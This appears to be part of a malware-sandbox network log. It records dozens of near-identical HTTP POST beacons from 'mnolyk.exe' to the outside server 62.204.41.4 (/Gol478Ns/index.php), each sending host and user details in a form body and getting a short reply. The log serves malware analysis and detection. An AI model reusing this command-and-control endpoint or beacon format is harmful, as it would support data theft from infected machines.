Feb 7, 2023 20:02:02.719021082 CET	399	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:02.783189058 CET	399	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
259	192.168.2.6	49982	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:02.953057051 CET	400	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:03.016334057 CET	400	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49744	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:57.142499924 CET	131	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:57.207439899 CET	131	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
260	192.168.2.6	49983	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:03.190207005 CET	401	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:03.259171963 CET	401	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
261	192.168.2.6	49984	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:03.441087008 CET	402	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:03.505045891 CET	402	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
262	192.168.2.6	49985	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:03.672174931 CET	403	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:03.735590935 CET	403	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
263	192.168.2.6	49986	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:03.914623976 CET	404	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:03.981905937 CET	404	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
264	192.168.2.6	49987	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:04.169863939 CET	405	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:04.233376026 CET	405	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
265	192.168.2.6	49988	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:04.410732031 CET	406	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:04.476504087 CET	406	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
266	192.168.2.6	49989	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:05.120373964 CET	407	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:05.187333107 CET	407	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
267	192.168.2.6	49990	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:05.389457941 CET	408	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:05.453105927 CET	408	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
268	192.168.2.6	49991	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:05.764040947 CET	409	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:05.828155994 CET	409	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
269	192.168.2.6	49992	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:06.575938940 CET	410	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:06.642028093 CET	410	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49745	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:57.394746065 CET	132	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:57.457775116 CET	132	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
270	192.168.2.6	49993	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:07.121548891 CET	411	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:07.187078953 CET	411	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
271	192.168.2.6	49994	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:09.136023998 CET	412	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:09.200330019 CET	412	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
272	192.168.2.6	49995	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:09.662326097 CET	413	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:09.728123903 CET	413	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
273	192.168.2.6	49996	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:09.912451982 CET	414	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:09.978259087 CET	414	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
274	192.168.2.6	49997	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:10.169392109 CET	415	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:10.236095905 CET	415	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
275	192.168.2.6	49998	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:10.416841030 CET	416	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:10.481199980 CET	416	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
276	192.168.2.6	49999	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:10.659482956 CET	417	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:10.723718882 CET	417	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
277	192.168.2.6	50000	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:10.893167019 CET	418	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
